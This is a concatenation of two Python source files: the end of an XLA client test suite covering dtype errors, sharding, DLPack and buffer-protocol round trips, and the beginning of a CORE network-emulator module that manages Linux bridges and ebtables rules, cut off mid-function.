  """Tests for device enumeration on the backend."""

  def testPlatform(self):
    # Every local device must report the backend's platform name.
    for device in self.backend.local_devices():
      self.assertEqual(device.platform, self.backend.platform)
tests.append(DeviceTest)
class ErrorTest(ComputationTest):
  """Tests that dtype mismatches at compile/execute time raise clear errors."""

  def setUp(self):
    super(ErrorTest, self).setUp()
    self.f32_scalar_2 = NumpyArrayF32(2.0)
    self.s32_scalar_2 = NumpyArrayS32(2)

  def testCompileWithWrongElementTypeInLayout(self):
    """Compiling with an f32 argument layout for an s32 parameter must fail."""
    c = self._NewComputation()
    c.set_op_metadata(xla_client.CurrentSourceInfoMetadata())
    ops.Parameter(c, 0, xla_client.shape_from_pyval(self.s32_scalar_2))
    c.clear_op_metadata()

    options = xla_client.CompileOptions()
    options.argument_layouts = [
        xla_client.Shape.array_shape(np.dtype(np.float32), [])
    ]

    def TestFun():
      return self.backend.compile(c.build(), compile_options=options)

    self.assertRaisesRegex(
        RuntimeError, r".*Invalid argument shape.*"
        r"expected s32\[\], got f32\[\].*", TestFun)

  def testInvokeWithWrongElementType(self):
    """Executing with an f32 argument against an s32 parameter must fail."""
    c = self._NewComputation()
    c.set_op_metadata(xla_client.CurrentSourceInfoMetadata())
    ops.Parameter(c, 0, xla_client.shape_from_pyval(self.s32_scalar_2))
    c.clear_op_metadata()

    def TestFun():
      return xla_client.execute_with_python_values(
          self.backend.compile(c.build()), [self.f32_scalar_2], self.backend)

    self.assertRaisesRegex(
        RuntimeError, r"Invalid argument: Argument does not match.*"
        r"want s32\[\], got f32\[\].*", TestFun)
tests.append(EmbeddedComputationsTest)
class ComputationRootTest(ComputationTest):
  """Tests related to setting the root of the computation."""

  def testComputationRootDifferentFromLastOp(self):
    """build(result) makes `result` the root even though a later op exists."""
    c = self._NewComputation()
    x = ops.Parameter(c, 0, xla_client.shape_from_pyval(NumpyArrayF32(2.0)))
    result = ops.Add(x, ops.Constant(c, np.float32(3.14)))
    # Deliberately dead op: it is NOT the root passed to build() below.
    ops.Add(result, ops.Constant(c, np.float32(1.618)))

    arg = NumpyArrayF32(1.0)
    compiled_c = self.backend.compile(c.build(result))
    ans, = xla_client.execute_with_python_values(
        compiled_c, [arg], backend=self.backend)
    np.testing.assert_allclose(ans, 4.14)
tests.append(ComputationRootTest)
class SetShardingTest(ComputationTest):
  """Tests related to set OpSharding."""

  def testSetSharding(self):
    """Applying a REPLICATED sharding to one op must not change the result."""
    c = self._NewComputation()
    sharding = xla_client.OpSharding()
    sharding.type = xla_client.OpSharding.Type.REPLICATED
    sharding.tile_assignment_dimensions = [1]
    sharding.tile_assignment_devices = [0]
    # The sharding applies only to ops created between set/clear_sharding,
    # i.e. the parameter below.
    c.set_sharding(sharding)
    x = ops.Parameter(c, 0, xla_client.shape_from_pyval(NumpyArrayF32(2.0)))
    c.clear_sharding()

    result = ops.Add(x, ops.Constant(c, np.float32(3.14)))
    # Deliberately dead op: `result` is the root passed to build() below.
    ops.Add(result, ops.Constant(c, np.float32(1.618)))
    arg = NumpyArrayF32(1.0)
    compiled_c = self.backend.compile(c.build(result))
    ans, = xla_client.execute_with_python_values(
        compiled_c, [arg], backend=self.backend)
    np.testing.assert_allclose(ans, 4.14)
tests.append(SetShardingTest)
testcase_shapes = [
(),
(1,),
(2, 3),
(2, 0),
(0, 7),
(4, 1, 2),
(2, 1, 3),
(2, 4, 1),
(3, 1),
(1, 3),
]
def FormatShapeAndDtype(shape, dtype):
  """Builds a test-case name suffix such as "_float32[2,3]" from shape/dtype."""
  dims = ",".join(str(dim) for dim in shape)
  return "_{}[{}]".format(np.dtype(dtype).name, dims)
class DLPackTest(parameterized.TestCase):
  """Tests for DLPack interop: buffer <-> DLPack capsule round trips."""

  def setUp(self):
    super(DLPackTest, self).setUp()
    self.backend = xla_backend()
    if self.backend.platform not in ("cpu", "gpu"):
      self.skipTest("DLPack requires CPU or GPU")
    # Always keep a CPU backend around; the GPU backend is optional.
    self.cpu_backend = (
        self.backend
        if self.backend.platform == "cpu" else xla_client.make_cpu_client())
    self.gpu_backend = (
        self.backend if self.backend.platform == "gpu" else None)

  # pylint: disable=g-complex-comprehension
  # pyformat: disable
  @parameterized.named_parameters({
      "testcase_name": "{}_own={}_gpu={}".format(
          FormatShapeAndDtype(shape, dtype), take_ownership, gpu),
      "dtype": dtype,
      "shape": shape,
      "take_ownership": take_ownership,
      "gpu": gpu
  } for dtype in dlpack_dtypes for shape in testcase_shapes
                               for take_ownership in [False, True]
                               for gpu in [False, True])
  # pyformat: enable
  def testRoundTrip(self, dtype, shape, take_ownership, gpu):
    """Buffer -> DLPack tensor -> buffer round trip preserves contents."""
    if gpu and self.gpu_backend is None:
      raise unittest.SkipTest("Test not running with GPU support")
    backend = self.gpu_backend if gpu else self.cpu_backend
    if dtype == np.bool_:
      x = np.random.randint(0, 2, size=shape).astype(np.bool_)
    else:
      x = np.array(np.random.rand(*shape) * 100, dtype=dtype)
    buffer = backend.buffer_from_pyval(x)
    dlt = xla_client._xla.buffer_to_dlpack_managed_tensor(
        buffer, take_ownership=take_ownership)
    del buffer  # Free "buffer" to make sure dlt retains ownership.
    self.assertEqual(type(dlt).__name__, "PyCapsule")
    y = xla_client._xla.dlpack_managed_tensor_to_buffer(
        dlt, self.cpu_backend, self.gpu_backend)
    np.testing.assert_array_equal(
        x.astype(np.uint8) if dtype == np.bool_ else x, y.to_py())

  def testTensorsCanBeConsumedOnceOnly(self):
    """A DLPack capsule converted with take_ownership may be consumed once."""
    x = np.array(np.random.rand(3, 4, 5, 6), dtype=np.float32)
    buffer = self.backend.buffer_from_pyval(x)
    dlt = xla_client._xla.buffer_to_dlpack_managed_tensor(
        buffer, take_ownership=True)

    def ConsumeDLPackTensor():
      _ = xla_client._xla.dlpack_managed_tensor_to_buffer(dlt, self.backend)

    ConsumeDLPackTensor()
    self.assertRaisesRegex(
        RuntimeError, ".*a DLPack tensor may be consumed at most once.*",
        ConsumeDLPackTensor)

  def testTensorsCanBeOwnedOnceOnly(self):
    """Taking ownership deletes the buffer; a second take must fail."""
    x = np.array(np.random.rand(3, 4, 5, 6), dtype=np.float32)
    buffer = self.backend.buffer_from_pyval(x)
    _ = xla_client._xla.buffer_to_dlpack_managed_tensor(
        buffer, take_ownership=True)
    self.assertTrue(buffer.is_deleted())
    with self.assertRaisesRegex(
        RuntimeError,
        "Cannot convert deleted/invalid buffer to DLPack tensor.*"):
      _ = xla_client._xla.buffer_to_dlpack_managed_tensor(
          buffer, take_ownership=True)

  def testNonOwnedDlpackCanBeViewedTwice(self):
    """Without ownership transfer, multiple DLPack views of one buffer work."""
    x = np.array(np.random.rand(3, 4, 5, 6), dtype=np.float32)
    buffer = self.backend.buffer_from_pyval(x)
    d1 = xla_client._xla.buffer_to_dlpack_managed_tensor(
        buffer, take_ownership=False)
    d2 = xla_client._xla.buffer_to_dlpack_managed_tensor(
        buffer, take_ownership=False)

    y = xla_client._xla.dlpack_managed_tensor_to_buffer(d1, self.backend)
    z = xla_client._xla.dlpack_managed_tensor_to_buffer(d2, self.backend)
    del d1, d2
    # The original buffer and both views stay valid and equal.
    np.testing.assert_array_equal(x, buffer.to_py())
    np.testing.assert_array_equal(x, y.to_py())
    np.testing.assert_array_equal(x, z.to_py())
tests.append(DLPackTest)
class BufferProtocolTest(parameterized.TestCase):
  """Tests for the Python buffer protocol on CPU device buffers."""

  def setUp(self):
    super(BufferProtocolTest, self).setUp()
    self.backend = xla_backend()
    if self.backend.platform != "cpu":
      self.skipTest("Test requires CPU")

  # pylint: disable=g-complex-comprehension
  @parameterized.named_parameters({
      "testcase_name": FormatShapeAndDtype(shape, dtype),
      "dtype": dtype,
      "shape": shape
  } for dtype in standard_dtypes if dtype != bfloat16
                                 for shape in testcase_shapes)
  def testRoundTrip(self, dtype, shape):
    """ZERO_COPY buffers alias host memory; DURING_CALL buffers do not."""
    x = np.array(np.random.rand(*shape) * 100, dtype=dtype)
    x_ptr = x.__array_interface__["data"][0]
    buffer = self.backend.buffer_from_pyval(
        x, host_buffer_semantics=xla_client.HostBufferSemantics.ZERO_COPY)
    y = np.array(buffer, copy=False)
    y_ptr = y.__array_interface__["data"][0]
    np.testing.assert_array_equal(x, y)
    # If the input was sufficiently aligned, the input and output should
    # alias.
    self.assertTrue((x_ptr & 15) != 0 or x_ptr == y_ptr)
    self.assertEqual(y_ptr, buffer.unsafe_buffer_pointer())

    during_call = xla_client.HostBufferSemantics.IMMUTABLE_ONLY_DURING_CALL
    buffer2 = self.backend.buffer_from_pyval(
        x, host_buffer_semantics=during_call)
    z = np.array(buffer2, copy=False)
    # DURING_CALL semantics must copy, so the pointers differ.
    self.assertNotEqual(x.__array_interface__["data"][0],
                        z.__array_interface__["data"][0])

  def testDeleteWithActiveView(self):
    """A live numpy view must keep a deleted buffer's storage alive."""
    x = np.random.randn(20, 10)
    buffer = self.backend.buffer_from_pyval(x)
    buffer_ptr = buffer.unsafe_buffer_pointer()
    y = np.array(buffer, copy=False)
    buffer.delete()
    # It is still legal to access `y`; the array view must keep it alive.
    np.testing.assert_array_equal(x, y)
    self.assertEqual(y.__array_interface__["data"][0], buffer_ptr)
tests.append(BufferProtocolTest)
class TracebackTest(absltest.TestCase):
  """Tests for traceback capture on buffers and executables."""

  def setUp(self):
    super(TracebackTest, self).setUp()
    self.backend = xla_backend()

  def testNoTracebacksIfDisabled(self):
    """With tracebacks disabled, no object records a traceback."""
    with xla_client.tracebacks(enabled=False):
      self.assertEqual(None, xla_client.Traceback.get_traceback())
      buffer = self.backend.buffer_from_pyval(np.array(7, np.int32))
      self.assertEqual(None, buffer.traceback)

      b = xla_client.XlaBuilder("computation")
      ops.Add(ops.Constant(b, np.int32(1)), ops.Constant(b, np.int32(2)))
      e = self.backend.compile(b.build())
      self.assertEqual(None, e.traceback)

  def assertIsTracebackContaining(self, tb, function):
    # Helper: `tb` must be a Traceback whose frames include `function`.
    self.assertIsInstance(tb, xla_client.Traceback)
    self.assertIn(function, str(tb))
    self.assertTrue(any(f.function_name == function for f in tb.frames))

  def testTracebacks(self):
    """With tracebacks enabled, buffers and executables record their origin."""
    with xla_client.tracebacks(enabled=True):
      tb = xla_client.Traceback.get_traceback()
      self.assertIsTracebackContaining(tb, "testTracebacks")

      # Tracebacks are not implemented on the TPU driver extension's variant
      # of buffers and executables.
      if not isinstance(self.backend, xla_client.Client):
        return

      buffer = self.backend.buffer_from_pyval(np.array(7, np.int32))
      self.assertIsTracebackContaining(buffer.traceback, "testTracebacks")

      b = xla_client.XlaBuilder("computation")
      ops.Add(ops.Constant(b, np.int32(1)), ops.Constant(b, np.int32(2)))
      e = self.backend.compile(b.build())
      self.assertIsTracebackContaining(e.traceback, "testTracebacks")

  def testNestedFunction(self):
    """Traceback frames reflect the Python call stack, innermost first."""

    def AFunction():

      def AnotherFunction():
        return xla_client.Traceback.get_traceback()

      return AnotherFunction()

    with xla_client.tracebacks(enabled=True):
      tb = AFunction()
      self.assertIsInstance(tb, xla_client.Traceback)
      frames = tb.frames
      i = next(
          i for (i, f) in enumerate(frames) if f.function_name == "AFunction")
      self.assertEqual(frames[i - 1].function_name, "AnotherFunction")
      self.assertEqual(frames[i + 1].function_name, "testNestedFunction")
tests.append(TracebackTest)
class ClientTest(ComputationTest):
  """Tests for backend/client-level APIs."""

  def setUp(self):
    super(ClientTest, self).setUp()
    self.backend = xla_backend()

  def testPlatformVersion(self):
    """platform_version has the expected per-platform format."""
    version = self.backend.platform_version
    logging.info("platform_version:\n%s", version)
    if self.backend.platform == "cpu":
      self.assertEqual(version, "<unknown>")
    elif self.backend.platform == "gpu":
      # Following is false if not built with --config=cuda
      if test_util.is_gpu_available(cuda_only=True):
        self.assertTrue(
            re.match(r"^cuda \d{4,}$", version),
            msg=f"Expected CUDA version string; got {repr(version)}")
      else:
        self.assertEqual(version, "<unknown>")
    elif self.backend.platform == "tpu" and not cloud_tpu:
      self.assertIn("tpu", version.lower())
      self.assertIn("cl/", version)

  @unittest.skipIf(cloud_tpu or tfrt_tpu, "not implemented")
  def testExecutableSerialization(self):
    """A serialized and deserialized executable computes the same result."""
    if self.backend.platform != "tpu":
      self.skipTest("Test requires tpu platform")
    c = self._NewComputation()
    ops.Add(
        ops.Constant(c, NumpyArrayS32([1, 2])),
        ops.Constant(c, NumpyArrayS32([3, 4])))

    options = xla_client.CompileOptions()
    executable = self.backend.compile(c.build(), options)
    self.assertLen(executable.hlo_modules(), 1)

    serialized = self.backend.serialize_executable(executable)
    deserialized = self.backend.deserialize_executable(
        serialized,
        executable.hlo_modules()[0], options)

    expected, = xla_client.execute_with_python_values(executable, (),
                                                      self.backend)
    actual, = xla_client.execute_with_python_values(deserialized, (),
                                                    self.backend)
    self.assertTrue(np.all(actual == expected))
tests.append(ClientTest)
# TODO(b/182461453): Add TFRT and cloud TPU implementation of
# ReadDynamicShapes
class DynamicReshapeTest(ComputationTest):
  """Tests related to DynamicReshape."""

  def _CompareToPyAndBufferProtocol(self, builder, args, expected_results,
                                    test_fn):
    # Executes `builder` on `args` and checks each output buffer both via
    # to_py() and, on CPU (non-bfloat16), via the Python buffer protocol.
    compiled = self.backend.compile(builder.build())
    output_buffers = compiled.execute([
        self.backend.buffer_from_pyval(
            arg, device=compiled.local_devices()[0]) for arg in args
    ])
    self.assertLen(output_buffers, len(expected_results))
    for buf, expected in zip(output_buffers, expected_results):
      to_py_result = buf.to_py()
      self.assertEqual(expected.shape, to_py_result.shape)
      test_fn(expected, to_py_result)
      if self.backend.platform == "cpu" and buf.dtype != bfloat16:
        mview = memoryview(buf)
        self.assertEqual(expected.shape, mview.shape)
        test_fn(expected, np.asarray(mview))
      else:
        # Buffer protocol expected to fail on non-cpu platforms and bfloat16
        # Note that np.asarray(buf) doesn't throw an exception. To test if the
        # error was thrown properly we must use memoryview(buf).
        with self.assertRaises(BufferError):
          memoryview(buf)

  # 1D reshape of full size, half size, and size of 0.
  @unittest.skipIf(cloud_tpu or tfrt_tpu or external_tpu, "not implemented")
  @parameterized.parameters((5), (3), (0))
  def testReshape1D(self, reshape_size):
    """Dynamically truncates range(5) to the first `reshape_size` elements."""
    full_size = 5
    c = self._NewComputation()
    arg = np.array(reshape_size, dtype=np.int32)
    expected = np.array(range(reshape_size), dtype=np.int32)
    p = ops.Parameter(c, 0, xla_client.shape_from_pyval(arg))
    ops.DynamicReshape(
        ops.Constant(c, NumpyArrayS32(range(full_size))), [p], [full_size],
        [True])
    self._CompareToPyAndBufferProtocol(c, [arg], [expected],
                                       np.testing.assert_equal)

  # 2D reshape with an slice on the minor dimension. We test different types
  # where the strides may differ between the host and devices. The reshaped
  # physical memory layout is not consecutive, and we test if the program can
  # return the correct logical view of the data.
  @unittest.skipIf(cloud_tpu or tfrt_tpu or external_tpu, "not implemented")
  @parameterized.named_parameters({
      "testcase_name": "_{}".format(dtype.__name__),
      "dtype": dtype,
  } for dtype in int_dtypes + float_dtypes)
  def testReshape2D(self, dtype):
    """Dynamically slices a 2x3 array down to its first two columns."""
    arg0 = np.array([[1, 2, 3], [4, 5, 6]], dtype=dtype)
    arg1 = np.array(2, dtype=np.int32)
    expected = np.array([[1, 2], [4, 5]], dtype=np.int32)
    c = self._NewComputation()
    p0 = ops.Parameter(c, 0, xla_client.shape_from_pyval(arg0))
    p1 = ops.Parameter(c, 1, xla_client.shape_from_pyval(arg1))
    ops.DynamicReshape(p0, [p1, p1], [2, 3], [False, True])
    self._CompareToPyAndBufferProtocol(c, [arg0, arg1], [expected],
                                       np.testing.assert_equal)

  @unittest.skipIf(cloud_tpu or tfrt_tpu, "not implemented")
  @parameterized.named_parameters({
      "testcase_name": "_{}".format(dtype.__name__),
      "dtype": dtype,
  } for dtype in int_dtypes + float_dtypes)
  def testDynamicShapeArgs(self, dtype):
    """Reduces a dynamically-sized prefix of range(10): sum(0..3) == 6."""
    full_size = 10
    dynamic_shape_size = 4
    # subcomputation 1
    binary_add_builder = self._NewComputation()
    scalar_shape = xla_client.Shape.scalar_shape(np.dtype(dtype))
    ops.Add(
        ops.Parameter(binary_add_builder, 0, scalar_shape),
        ops.Parameter(binary_add_builder, 1, scalar_shape))
    # subcomputation 2
    reshape_reduce_builder = self._NewComputation()
    dshape = xla_client.Shape.array_shape(
        np.dtype(dtype), dims=[full_size], dynamic_dimensions=[True])
    reshape_reduce_p = ops.Parameter(reshape_reduce_builder, 0, dshape)
    ops.Reduce(
        reshape_reduce_builder,
        operands=[reshape_reduce_p],
        init_values=[ops.Constant(reshape_reduce_builder, dtype(0))],
        computation=binary_add_builder.build(),
        dimensions_to_reduce=[0])
    # main computation: sum(range(full_size)[:dynamic_shape_size])
    c = self._NewComputation()
    arg = np.array(dynamic_shape_size, dtype=np.int32)
    p = ops.Parameter(c, 0, xla_client.shape_from_pyval(arg))
    reshaped = ops.DynamicReshape(
        ops.Constant(c, np.array(range(full_size), dtype=dtype)), [p],
        [full_size], [True])
    ops.Call(c, reshape_reduce_builder.build(), operands=(reshaped,))
    self._ExecuteAndCompareClose(c, [arg], [dtype(6)])
tests.append(DynamicReshapeTest)
class DeviceAssignmentTest(ComputationTest):
  """Tests for DeviceAssignment construction and serialization."""

  def testSerialize(self):
    """A (replica, computation) assignment serializes to non-empty bytes."""
    shape = (3, 4)
    device_assignment = xla_client.DeviceAssignment.create(
        np.arange(np.prod(shape)).reshape(*shape))
    self.assertEqual(device_assignment.replica_count(), shape[0])
    self.assertEqual(device_assignment.computation_count(), shape[1])
    serialized = device_assignment.serialize()
    self.assertIsInstance(serialized, bytes)
    self.assertNotEmpty(serialized)
tests.append(DeviceAssignmentTest)
return tests
def InstantiateTests(globals_dict, backend_fn, test_prefix="", **kw):
  """Injects one concrete test class per factory-produced class into a module.

  The backend constructor is memoized so all tests share a single backend
  instance (creating one per test causes GPU OOM and is probably inefficient).
  """
  cached_backend_fn = functools.lru_cache(maxsize=None)(backend_fn)
  for base in TestFactory(cached_backend_fn, **kw):
    name = test_prefix + base.__name__
    subclass = type(name, (base,), {})
    # Drop the factory from the qualified name so test IDs stay readable.
    subclass.__qualname__ = subclass.__name__
    globals_dict[subclass.__name__] = subclass
backends = {
"cpu": xla_client.make_cpu_client,
"gpu": xla_client.make_gpu_client,
}
if __name__ == "__main__":
flags.DEFINE_string("backend", "cpu", "Target platform.")
# pylint: disable=unnecessary-lambda
InstantiateTests(globals(), lambda: backends[FLAGS.backend]())
# pylint: enable=unnecessary-lambda
absltest.main()
|
network.py | """
Defines network nodes used within core.
"""
import logging
import os
import socket
import threading
import time
from socket import AF_INET, AF_INET6
from core import CoreCommandError, constants, utils
from core.emulator.data import LinkData
from core.emulator.enumerations import LinkTypes, NodeTypes, RegisterTlvs
from core.nodes import ipaddress
from core.nodes.base import CoreNetworkBase
from core.nodes.interface import GreTap, Veth
utils.check_executables(
[constants.BRCTL_BIN, constants.IP_BIN, constants.EBTABLES_BIN, constants.TC_BIN]
)
ebtables_lock = threading.Lock()
class EbtablesQueue(object):
    """
    Helper class for queuing up ebtables commands into rate-limited
    atomic commits. This improves performance and reliability when there are
    many WLAN link updates.
    """

    # update rate is every 300ms
    rate = 0.3
    # ebtables atomic file used to batch rule changes before one kernel commit
    atomic_file = "/tmp/pycore.ebtables.atomic"

    def __init__(self):
        """
        Initialize the helper class, but don't start the update thread
        until a WLAN is instantiated.
        """
        self.doupdateloop = False
        self.updatethread = None
        # this lock protects cmds and updates lists
        self.updatelock = threading.Lock()
        # list of pending ebtables commands
        self.cmds = []
        # list of WLANs requiring update
        self.updates = []
        # timestamps of last WLAN update; this keeps track of WLANs that are
        # using this queue
        self.last_update_time = {}

    def startupdateloop(self, wlan):
        """
        Kick off the update loop; only needs to be invoked once.

        :param wlan: wlan to track updates for
        :return: nothing
        """
        with self.updatelock:
            self.last_update_time[wlan] = time.time()
        if self.doupdateloop:
            return
        self.doupdateloop = True
        self.updatethread = threading.Thread(target=self.updateloop)
        self.updatethread.daemon = True
        self.updatethread.start()

    def stopupdateloop(self, wlan):
        """
        Kill the update loop thread if there are no more WLANs using it.

        :param wlan: wlan to stop tracking updates for
        :return: nothing
        """
        with self.updatelock:
            try:
                del self.last_update_time[wlan]
            except KeyError:
                logging.exception(
                    "error deleting last update time for wlan, ignored before: %s", wlan
                )
            if len(self.last_update_time) > 0:
                return
            self.doupdateloop = False
        # join the worker thread OUTSIDE the lock: updateloop() acquires
        # updatelock each cycle, so joining while holding it can deadlock
        if self.updatethread:
            self.updatethread.join()
            self.updatethread = None

    def ebatomiccmd(self, cmd):
        """
        Helper for building ebtables atomic file command list.

        :param list[str] cmd: ebtable command
        :return: ebtable atomic command
        :rtype: list[str]
        """
        r = [constants.EBTABLES_BIN, "--atomic-file", self.atomic_file]
        if cmd:
            r.extend(cmd)
        return r

    def lastupdate(self, wlan):
        """
        Return the time elapsed since this WLAN was last updated.

        :param wlan: wlan entity
        :return: elapsed time
        :rtype: float
        """
        try:
            elapsed = time.time() - self.last_update_time[wlan]
        except KeyError:
            # first sighting of this wlan: record it and report no elapsed time
            self.last_update_time[wlan] = time.time()
            elapsed = 0.0
        return elapsed

    def updated(self, wlan):
        """
        Keep track of when this WLAN was last updated.

        :param wlan: wlan entity
        :return: nothing
        """
        self.last_update_time[wlan] = time.time()
        self.updates.remove(wlan)

    def updateloop(self):
        """
        Thread target that looks for WLANs needing update, and
        rate limits the amount of ebtables activity. Only one userspace program
        should use ebtables at any given time, or results can be unpredictable.

        :return: nothing
        """
        while self.doupdateloop:
            with self.updatelock:
                # iterate over a snapshot: updated() removes entries from
                # self.updates, and mutating a list while iterating it
                # silently skips elements
                for wlan in list(self.updates):
                    # Check if wlan is from a previously closed session. Because of the
                    # rate limiting scheme employed here, this may happen if a new session
                    # is started soon after closing a previous session.
                    # TODO: if these are WlanNodes, this will never throw an exception
                    try:
                        wlan.session
                    except Exception:
                        # Just mark as updated to remove from self.updates.
                        self.updated(wlan)
                        continue

                    if self.lastupdate(wlan) > self.rate:
                        self.buildcmds(wlan)
                        self.ebcommit(wlan)
                        self.updated(wlan)
            time.sleep(self.rate)

    def ebcommit(self, wlan):
        """
        Perform ebtables atomic commit using commands built in the self.cmds list.

        :return: nothing
        """
        # save kernel ebtables snapshot to a file
        args = self.ebatomiccmd(["--atomic-save"])
        utils.check_cmd(args)

        # modify the table file using queued ebtables commands
        for c in self.cmds:
            args = self.ebatomiccmd(c)
            utils.check_cmd(args)
        self.cmds = []

        # commit the table file to the kernel
        args = self.ebatomiccmd(["--atomic-commit"])
        utils.check_cmd(args)

        try:
            os.unlink(self.atomic_file)
        except OSError:
            logging.exception("error removing atomic file: %s", self.atomic_file)

    def ebchange(self, wlan):
        """
        Flag a change to the given WLAN"s _linked dict, so the ebtables
        chain will be rebuilt at the next interval.

        :return: nothing
        """
        with self.updatelock:
            if wlan not in self.updates:
                self.updates.append(wlan)

    def _cross_rules(self, brname, netif1, netif2, action):
        """
        Build the symmetric pair of ebtables rules that applies `action` to
        traffic between two interfaces, in both directions.

        :param str brname: bridge chain name
        :param netif1: first interface
        :param netif2: second interface
        :param str action: ebtables target, e.g. "ACCEPT" or "DROP"
        :return: two ebtables rule argument lists
        :rtype: list[list[str]]
        """
        return [
            ["-A", brname, "-i", netif1.localname,
             "-o", netif2.localname, "-j", action],
            ["-A", brname, "-o", netif1.localname,
             "-i", netif2.localname, "-j", action],
        ]

    def buildcmds(self, wlan):
        """
        Inspect a _linked dict from a wlan, and rebuild the ebtables chain for that WLAN.

        :return: nothing
        """
        with wlan._linked_lock:
            # flush the chain
            self.cmds.extend([["-F", wlan.brname]])
            # rebuild the chain: with a DROP policy, linked pairs get explicit
            # ACCEPT rules; with an ACCEPT policy, unlinked pairs get DROP rules
            for netif1, v in wlan._linked.items():
                for netif2, linked in v.items():
                    if wlan.policy == "DROP" and linked:
                        self.cmds.extend(
                            self._cross_rules(wlan.brname, netif1, netif2, "ACCEPT")
                        )
                    elif wlan.policy == "ACCEPT" and not linked:
                        self.cmds.extend(
                            self._cross_rules(wlan.brname, netif1, netif2, "DROP")
                        )
# a global object because all WLANs share the same queue
# cannot have multiple threads invoking the ebtables commnd
ebq = EbtablesQueue()
def ebtablescmds(call, cmds):
    """
    Execute a batch of ebtables commands while holding the global ebtables lock.

    :param func call: callable invoked for each command's argument list
    :param list cmds: list of command argument lists to run
    :return: nothing
    """
    with ebtables_lock:
        for command in cmds:
            call(command)
class CoreNetwork(CoreNetworkBase):
    """
    Provides linux bridge network functionality for core nodes.
    """

    # default ebtables chain policy for the bridge; subclasses override this
    policy = "DROP"

    def __init__(self, session, _id=None, name=None, start=True, policy=None):
        """
        Creates a LxBrNet instance.

        :param core.session.Session session: core session instance
        :param int _id: object id
        :param str name: object name
        :param bool start: start flag
        :param policy: network policy
        """
        CoreNetworkBase.__init__(self, session, _id, name, start)
        if name is None:
            name = str(self.id)
        if policy is not None:
            self.policy = policy
        self.name = name
        sessionid = self.session.short_session_id()
        # bridge device name encodes node id and session id: "b.<id>.<session>"
        self.brname = "b.%s.%s" % (str(self.id), sessionid)
        self.up = False
        if start:
            self.startup()
            # register with the global queue that batches ebtables rule updates
            ebq.startupdateloop(self)

    def startup(self):
        """
        Linux bridge startup logic.

        :return: nothing
        :raises CoreCommandError: when there is a command exception
        """
        utils.check_cmd([constants.BRCTL_BIN, "addbr", self.brname])
        # turn off spanning tree protocol and forwarding delay
        utils.check_cmd([constants.BRCTL_BIN, "stp", self.brname, "off"])
        utils.check_cmd([constants.BRCTL_BIN, "setfd", self.brname, "0"])
        utils.check_cmd([constants.IP_BIN, "link", "set", self.brname, "up"])
        # create a new ebtables chain for this bridge and jump to it from FORWARD
        ebtablescmds(
            utils.check_cmd,
            [
                [constants.EBTABLES_BIN, "-N", self.brname, "-P", self.policy],
                [
                    constants.EBTABLES_BIN,
                    "-A",
                    "FORWARD",
                    "--logical-in",
                    self.brname,
                    "-j",
                    self.brname,
                ],
            ],
        )
        # turn off multicast snooping so mcast forwarding occurs w/o IGMP joins
        snoop = "/sys/devices/virtual/net/%s/bridge/multicast_snooping" % self.brname
        if os.path.exists(snoop):
            with open(snoop, "w") as snoop_file:
                snoop_file.write("0")
        self.up = True

    def shutdown(self):
        """
        Linux bridge shutdown logic.

        :return: nothing
        """
        if not self.up:
            return
        ebq.stopupdateloop(self)
        try:
            utils.check_cmd([constants.IP_BIN, "link", "set", self.brname, "down"])
            utils.check_cmd([constants.BRCTL_BIN, "delbr", self.brname])
            # remove the FORWARD jump rule and delete this bridge's chain
            ebtablescmds(
                utils.check_cmd,
                [
                    [
                        constants.EBTABLES_BIN,
                        "-D",
                        "FORWARD",
                        "--logical-in",
                        self.brname,
                        "-j",
                        self.brname,
                    ],
                    [constants.EBTABLES_BIN, "-X", self.brname],
                ],
            )
        except CoreCommandError:
            logging.exception("error during shutdown")
        # removes veth pairs used for bridge-to-bridge connections
        for netif in self.netifs():
            netif.shutdown()
        self._netif.clear()
        self._linked.clear()
        del self.session
        self.up = False

    # TODO: this depends on a subtype with localname defined, seems like the wrong place for this to live
    def attach(self, netif):
        """
        Attach a network interface.

        :param core.netns.vnode.VEth netif: network interface to attach
        :return: nothing
        """
        if self.up:
            utils.check_cmd(
                [constants.BRCTL_BIN, "addif", self.brname, netif.localname]
            )
            utils.check_cmd([constants.IP_BIN, "link", "set", netif.localname, "up"])
        CoreNetworkBase.attach(self, netif)

    def detach(self, netif):
        """
        Detach a network interface.

        :param core.nodes.interface.Veth netif: network interface to detach
        :return: nothing
        """
        if self.up:
            utils.check_cmd(
                [constants.BRCTL_BIN, "delif", self.brname, netif.localname]
            )
        CoreNetworkBase.detach(self, netif)

    def linked(self, netif1, netif2):
        """
        Determine if the provided network interfaces are linked.

        :param core.nodes.interface.CoreInterface netif1: interface one
        :param core.nodes.interface.CoreInterface netif2: interface two
        :return: True if interfaces are linked, False otherwise
        :rtype: bool
        """
        # check if the network interfaces are attached to this network
        if self._netif[netif1.netifi] != netif1:
            raise ValueError("inconsistency for netif %s" % netif1.name)
        if self._netif[netif2.netifi] != netif2:
            raise ValueError("inconsistency for netif %s" % netif2.name)
        try:
            linked = self._linked[netif1][netif2]
        except KeyError:
            # derive the initial link state from the chain policy and cache it
            if self.policy == "ACCEPT":
                linked = True
            elif self.policy == "DROP":
                linked = False
            else:
                raise Exception("unknown policy: %s" % self.policy)
            self._linked[netif1][netif2] = linked
        return linked

    def unlink(self, netif1, netif2):
        """
        Unlink two PyCoreNetIfs, resulting in adding or removing ebtables
        filtering rules.

        :param core.nodes.interface.CoreInterface netif1: interface one
        :param core.nodes.interface.CoreInterface netif2: interface two
        :return: nothing
        """
        with self._linked_lock:
            if not self.linked(netif1, netif2):
                return
            self._linked[netif1][netif2] = False
        # schedule an ebtables chain rebuild for this network
        ebq.ebchange(self)

    def link(self, netif1, netif2):
        """
        Link two PyCoreNetIfs together, resulting in adding or removing
        ebtables filtering rules.

        :param core.nodes.interface.CoreInterface netif1: interface one
        :param core.nodes.interface.CoreInterface netif2: interface two
        :return: nothing
        """
        with self._linked_lock:
            if self.linked(netif1, netif2):
                return
            self._linked[netif1][netif2] = True
        # schedule an ebtables chain rebuild for this network
        ebq.ebchange(self)

    def linkconfig(
        self,
        netif,
        bw=None,
        delay=None,
        loss=None,
        duplicate=None,
        jitter=None,
        netif2=None,
        devname=None,
    ):
        """
        Configure link parameters by applying tc queuing disciplines on the interface.

        :param core.nodes.interface.Veth netif: interface one
        :param bw: bandwidth to set to
        :param delay: packet delay to set to
        :param loss: packet loss to set to
        :param duplicate: duplicate percentage to set to
        :param jitter: jitter to set to
        :param core.netns.vif.Veth netif2: interface two
        :param devname: device name
        :return: nothing
        """
        if devname is None:
            devname = netif.localname
        tc = [constants.TC_BIN, "qdisc", "replace", "dev", devname]
        parent = ["root"]
